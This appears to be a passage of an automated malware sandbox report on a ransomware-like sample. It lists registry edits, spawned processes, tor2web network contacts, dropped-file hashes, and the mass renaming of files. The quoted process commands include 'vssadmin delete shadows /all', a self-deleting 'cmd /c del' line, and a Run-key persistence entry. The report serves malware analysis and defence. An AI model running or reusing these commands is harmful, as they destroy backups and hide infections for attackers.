| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4C827E11-A24B-11EF-9D46-D6B302822781} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004ecf3e4259aa05419b9c0951a15b13190000000002000000000010660000000100002000000046928c5b24df8e6df6a8646658311650827767bb200db8b554229dbb52be1284000000000e8000000002000020000000dcf841d3d9192f9793d48e0eeff60d48df6786477dd03cbb8ddf49b5752893d920000000d80aabd13c79f87ac8e6c5201449032373f58e53ca4dc5cd00646e87474f5236400000000bb292eee62d830a114105a654ee28cf38e573428e4a94be2125b00814ebbb369f907a935ada022ded8903605e2e42073f7ae7668ea96199f41634bead67bd36 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004ecf3e4259aa05419b9c0951a15b131900000000020000000000106600000001000020000000039bd7dd4e1e161e7f27aef6d30b1a669e94796cabb210ae2a5b38b8a66477cb000000000e8000000002000020000000efac838b8e82c00028701fb7d2848f0806d139cf83e0eb59853d14d8631a44b490000000c6c422902e418b324c1ad070eb1a8e7ee1d83c092d4105fa27e52ac18684026c81d15576bf70c15eab10e7a257d6d645a96b12253564092a113df221863bd35e3313149d652c91af8d6cc9b2d0425b798923ad2e9e96f6997cae62eab3a10471212baa646b05a933be1277bd2cfe1a5faffe6ea897ad6d89c6ffb25bfd2f04dcd415d20d68512a2343742e86c69463f9400000002abfe29bd9c71570ed518691042775f7f038f1be6c74b052c3209a9d725dfd473f5e5c3bcdb31cbe12a3af463ff204b3ddec5867f7b1b5601ec2c89e2f5d4f83 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437724845" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\kifyvva.exe
C:\Users\Admin\AppData\Roaming\kifyvva.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275463 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:275472 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:472075 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:3552279 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:3159056 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:3159076 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:996382 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2256 CREDAT:2831395 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.org | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.blutmagie.de | udp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.fi | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
\Users\Admin\AppData\Roaming\kifyvva.exe
| MD5 | 209a288c68207d57e0ce6e60ebf60729 |
| SHA1 | e654d39cd13414b5151e8cf0d8f5b166dddd45cb |
| SHA256 | 3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370 |
| SHA512 | ce4a7e42738154183fc53702f0841dfd4ad1eb0567b13cc1ff0909f1d330e9cd2fb994375efc6f02e7eddaaae1f465ff93458412143266afdaff1c6bf6477fc3 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | c5dec7cba3faf35f20af2330cc7363ef |
| SHA1 | d8dc879ece2815b7fc88b50ee985c557f232ef6f |
| SHA256 | 21c06ccbfc7c9384adb210c41ad198873551e2579280272bdacf7ccdf29d3371 |
| SHA512 | 507abd729fe93baefa85753ae817eaabe6178e6c032a3b4650ecc9963fe0856ce0013aecf685735bff93ad964df54de5da03782fdbdb5f7837c7c04da9ecfb23 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | 415d5e8d2195ac80b8717205ba32f687 |
| SHA1 | 2981fd9e353b1ca5adbf3b30c596e06682b728eb |
| SHA256 | d828551b3944600d9f79b98f870313bdd8cf74fbbf390d9b3ddc35cb4181eca7 |
| SHA512 | ceaf9ae082b0cb83c59374b8f5ca5d6f30e3e4fdbb14fe70e10528b8e613ac010ec4fe9fde165b68dd61e5f568e260f1b08c11b23f46919fdd5c63862351b4bb |
C:\Users\Admin\AppData\Local\Temp\CabCBD9.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCD15.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0819cfa3fb4f3455d1c0578061b73fa2 |
| SHA1 | 47edfcf0a21ba7ebb3956e30a2750894b0d1f9c7 |
| SHA256 | c59801e3ae61d1087c3d212820dbc38353be8f09e2f619e3dd7fefe1c8b9bf24 |
| SHA512 | fdb65f559b12e430e4c608d4cd26bffc593042173c253f45994664a68e98cf9779a7aad8f5b4f1c47ad099e8e891c59125b9388f338ae814ac010efae3bb3775 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60ccd0b5dc0fbb6de5715b3e41965ac5 |
| SHA1 | dc84adb6b70c112a2edc68732c44b3232251265f |
| SHA256 | e64c946d29e93d22c02f26e44383c73c0693253c1ace95f7ad8e35fb1cd739ab |
| SHA512 | aede0b065c289a4a8c3ea6b7a2dbe2fa1412c54b44311846cedb4cafb3bc21770d96186b8d6fbaa4159db84870792737cd81075b10c941c7ba8c19e1f576e24e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 020dc77ce9f10056917f2f7de2cd3c20 |
| SHA1 | 5bf59b9970d3918ee92aa1a21098afa41d3f14f8 |
| SHA256 | fee718ce4e8bc56e7375d5353fb0ff6ae3f5c2ff77f4bde77fc4bf9aaf656511 |
| SHA512 | 7bc876a4a0fc107fc061be66ed6616b058ea250f48498426626a5d148d06801f22d55c6720ebd936da3093d606a2e1189d4aa8b63f1a4ea8dbaa373af2c16cef |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 827d971cd9cf1e4e5f7bc02391cb9c63 |
| SHA1 | 5f0fbbfe4e6c01a4059135b16c44161544805b06 |
| SHA256 | a65464ee6e9c2fe7f72e85793d8102e50cc626eb8b381922ad036ac30e64159f |
| SHA512 | 267d3ff4ab5c545a27052cdc835916987b4a501f61374427923f23686cd5d7155954ead4ab33973dfce78a9de6748ef86aa5417b8b0278c908707428c5291527 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e74ee57d09ff480d63632fdbede3bf38 |
| SHA1 | 2620fc49a37ac66e69c16fab97ac336924aaa31c |
| SHA256 | e05c28efab9e1671c01aab9b6fe9ce84881e26bfcc4582d509231fbb3652e242 |
| SHA512 | c42603503da572a92d187f720e20d2724fd0752da53d5492f8ca0cb74db1104a83a5889b5c6fce416f4d53795be7797eed669b4345171ff6691c0f0b555a1eb4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1966f40573392927f8a4ba8aefc042cd |
| SHA1 | 3a0a148871161aa8124d788a259207903582b9b1 |
| SHA256 | eb237694bc5fbd3b33494da18b7db98e0098ac3c050e57a827176117e05d75de |
| SHA512 | 8c2d78718a3380b4b59a7a2407b58d6d8e908d4db01b082baf44ac486b510d78eba6a496adbc83278f46048078bde44a233c9ba1b80c8682b54d9036aeffa673 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fb26b916eb3a3c0eebb0cbf72ee313a1 |
| SHA1 | b8ae9810563b80bc680f5e43eb690543bab5986f |
| SHA256 | fe42de7890daf4e40db1e92428bc7e1ca3345725a73764e76a94642f94399bf0 |
| SHA512 | e29f5da168296905347e02cf34aaf8edefb2f08b47c63d1063ea28359a57b24b3abf7d4931df21efc0442ae0d690b46f75cf0d3a931d2d0d4d587933400b5a2c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 32f7b5ad8f0c474ef00671bb2c9bb241 |
| SHA1 | 3fb9b6be5845f315807903a8595aba45b791591b |
| SHA256 | ee6888672be8fa1376f8b7020a455448a63510032aeb377d0fc0c5409fac04f6 |
| SHA512 | 007fcbd066b7e06c08d923832f91819485130cf9e2918cd27c5e36f35365a7a60875e459f1fc1a655035c846f5298f79ec37f9c9b4cd02bcb276a7117e431bfd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 49811d3f0b0605d98479f5d1e561b039 |
| SHA1 | 7cfe7320c5633629c80112037d56442500db15a8 |
| SHA256 | 69c84aef7bb20c3bfcebfc98da93059da49af1967c87079d7415132676b7a9ba |
| SHA512 | d9c37a1198344d98f07ee2f24435314c6b4af8d38ac09c865d0be786566605b474d049bcdcbc141217ed08d167d3fe4cf26a7f35637bb483eb0f338cc7c206f9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d2b58f8226a902fb7ed1586fec36a9c0 |
| SHA1 | e383172ca82130b3dd10bf2c632c3657ba911a97 |
| SHA256 | 2b5ea2c12653ae7fb742b55381de1fdabc765940a89518943f4fe07998985812 |
| SHA512 | 58d5e4321c65c79341a00298ebe679c051e9c52789025a4b75eebff2469510171ec8f1e2423936df8d8a0ecd8bd5974b33ed25d81f36f980499440f6c9e57088 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f8a67e3d2da1e54941ecff70a72c97b |
| SHA1 | f7fc5d6070907047188e2e88bc4009a2ff268b22 |
| SHA256 | 4c0513e76178ae48cb2dfd49fef4596985665f6975957e58ec30353ceaa9204d |
| SHA512 | 530dd158e77a9d46d45d17b6dd593ea4f96ec5513a5ffc31ed28a85f2115747dcbbfae5088e248d831ce834de5743c6f56c4106344202931d75940048f4efe03 |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | a0013763f961d6b0426111aa6a5b05d0 |
| SHA1 | e93c2126663767885c1b11415af7bd48c82f8f00 |
| SHA256 | 5297a69814f67723342e3c51915e76761dd10cbea620ee0ddc2801d096313393 |
| SHA512 | 1ad26a2813469a41df7f429579051bccd26dea7fb636cb1e442d525804aa01ab09661b37dba13226302089a00572711c8b2e91b5abd5db3dbe0197511923806e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\dnserror[1]
| MD5 | 73c70b34b5f8f158d38a94b9d7766515 |
| SHA1 | e9eaa065bd6585a1b176e13615fd7e6ef96230a9 |
| SHA256 | 3ebd34328a4386b4eba1f3d5f1252e7bd13744a6918720735020b4689c13fcf4 |
| SHA512 | 927dcd4a8cfdeb0f970cb4ee3f059168b37e1e4e04733ed3356f77ca0448d2145e1abdd4f7ce1c6ca23c1e3676056894625b17987cc56c84c78e73f60e08fc0d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT668XG4\NewErrorPageTemplate[1]
| MD5 | cdf81e591d9cbfb47a7f97a2bcdb70b9 |
| SHA1 | 8f12010dfaacdecad77b70a3e781c707cf328496 |
| SHA256 | 204d95c6fb161368c795bb63e538fe0b11f9e406494bb5758b3b0d60c5f651bd |
| SHA512 | 977dcc2c6488acaf0e5970cef1a7a72c9f9dc6bb82da54f057e0853c8e939e4ab01b163eb7a5058e093a8bc44ecad9d06880fdc883e67e28ac67fee4d070a4cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7BCOPU31\errorPageStrings[1]
| MD5 | e3e4a98353f119b80b323302f26b78fa |
| SHA1 | 20ee35a370cdd3a8a7d04b506410300fd0a6a864 |
| SHA256 | 9466d620dc57835a2475f8f71e304f54aee7160e134ba160baae0f19e5e71e66 |
| SHA512 | d8e4d73c76804a5abebd5dbc3a86dcdb6e73107b873175a8de67332c113fb7c4899890bf7972e467866fa4cd100a7e2a10a770e5a9c41cbf23b54351b771dcee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8P9TO0C6\httpErrorPagesScripts[1]
| MD5 | 3f57b781cb3ef114dd0b665151571b7b |
| SHA1 | ce6a63f996df3a1cccb81720e21204b825e0238c |
| SHA256 | 46e019fa34465f4ed096a9665d1827b54553931ad82e98be01edb1ddbc94d3ad |
| SHA512 | 8cbf4ef582332ae7ea605f910ad6f8a4bc28513482409fa84f08943a72cac2cf0fa32b6af4c20c697e1fac2c5ba16b5a64a23af0c11eefbf69625b8f9f90c8fa |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | aff820b331f335a8fe146f4e29b1b773 |
| SHA1 | c75c4323d3458b416ad7e57c1d09e159dccb1560 |
| SHA256 | acbd94697846d032afa51fede69cb73ac3e0f9636640df505a228a32f13a871a |
| SHA512 | 84f6d24282ac13a6fff908a81345a664b019edf08e34fca41bfade5bbd36bd243b1fd6e143dded6c4007a66ed141c1b071b297c116ebba8a86cd4ef2ae0d3b7f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 297a0836fef44ee60054b15adc56e048 |
| SHA1 | 5f7521727bb1bd685c748558f8f138c837e19f31 |
| SHA256 | bf7bd9f02e34d453c4c414b84fab15d4e3df370ee40f5cf8a37d94f2587afd25 |
| SHA512 | c4be7f3ad71f502e4c106025046c9aad26b78e4ccab9490d83a4210f2c66fcdf12e88d793a8904c8e734c098aa7f62219d191aaca794ed60672b0252e809b494 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9615d7b41ba44757263b0a8d8881234e |
| SHA1 | 474c6a1b98bc161c1b4c273ecde828906d4992d6 |
| SHA256 | ab94531baff4171658b97340ad509843510fcca6602ee10a2237d05dab8a44c2 |
| SHA512 | dd54ca8563f45e54bf89372e693fd656b01d66148229e321f81e5a4758a6a08f5cc9a2eea2b844186a887ead1aff7593fc392322c267173744a5b8d297f0f09a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4ebf34eaa8b58b5ab9bc494a693179da |
| SHA1 | 7e44251e2482041876fe631418ab25f602e2bfb9 |
| SHA256 | 625aef39792e0262adbee5eca606e2cd4d92a50ad27e55fc159b68d2175337de |
| SHA512 | 972ea60ceca1a76327540e70a36e745f8b623f048975de058bdb7a1274644eccb71c5ac9e52b45db17fc24180380100e7f5ea3da096dd6b90572817cf3d05de9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 859a0cff4275e41014e045006a944dd5 |
| SHA1 | 60bb60b4c8fb6d966b281f452b88060d0ad61cac |
| SHA256 | 0df4c044fe016b58e9d41f947a2472ed7b54ab8944066ccd9369ba9161175c49 |
| SHA512 | 7802785dcc428bc75b99dc4d3cf7bb7e28ee4ffbdaa9c262fe8f5e948ac0923c0b8e6b33b48b9e1a8398f787368b2593520bbd1e2e759a937fd9ae76e63eed42 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2d387795ff4709b0db99c9c0cf6e39df |
| SHA1 | 19a9b3e7504447daff4bddc9ca15be56e158c1e6 |
| SHA256 | a77630a905afb58d145cd8d82e09aad5234d3875d591ffe60f1fd64a0d1c03e5 |
| SHA512 | a1e3d5e4c3dd87d2d78ea43728558ab474cd2e0c9c8bf7988f99db4064ee293a9e725b6b9e5faa8f8105249da9ed110b24ec68c834b9b573fd5f7caaec6db1ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 934e62347a4174d71e1fb6983264da70 |
| SHA1 | 3bcc8c2739c4bf55d0b6ec395991ae7f9320a4b5 |
| SHA256 | ac0c73f28079b5bdce6abaec2718136767d65b22f629023c2965ae7b693c9cf6 |
| SHA512 | 42c8a35ca69e399db3563ce0a67066fa170edfff101617a39e82059de86ada10f8679d501d90bca57e197deeb764104c216ceeaab5a8585abd970419a2ad24db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 803a82b6c7dd89fc63c1ee57b7aabc51 |
| SHA1 | 7ae5fcd772d9abd80c51ddd42d511577d835a85d |
| SHA256 | cd9d155508135b4c1c5f542a6884d29c64cf3c4267b1fa34d7b84311ab6ab0d6 |
| SHA512 | 3d6c4fcbe944ff68f2126008c22ac234ab304be1d6d1aa160bcd10390d96a50034bd100eec594d90e79aa77227c65596585047486eb8827eaae2ea6907eac7b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fb0f59d0ef9ba51078cce2a0023f963 |
| SHA1 | ed2d23d28d21fa0acd02324a06f4cc8802f0a49b |
| SHA256 | b565acf191579a324a03ece53c484f2a86565df26e96df49ff65a8454e6079b3 |
| SHA512 | f3602daa9723d1723e98ce009189982cf404a19a514983193fe0fd17411d043e593736e0dae6c59708ee3cc43a2d54828a44dd0b566a5aa22a7f883dc85968f0 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win11-20241023-en
Max time kernel
91s
Max time network
82s
Command Line
Signatures
Renames multiple (4011) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\crypto13 = "C:\\Users\\Admin\\AppData\\Roaming\\ysljjud.exe" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Indicator Removal: File Deletion
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\default.help.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\es-ES\MSFT_RegistryResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\es-ES\lipeula.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\fr-FR\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_ProcessResource\ja-JP\MSFT_ProcessResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\it-IT\MSFT_GroupResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\fr-FR\MSFT_WindowsOptionalFeature.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\ServiceSet\ServiceSet.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\de-DE\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\ja-JP\TestDtc.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\de-DE\PSDesiredStateConfiguration.Resource.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
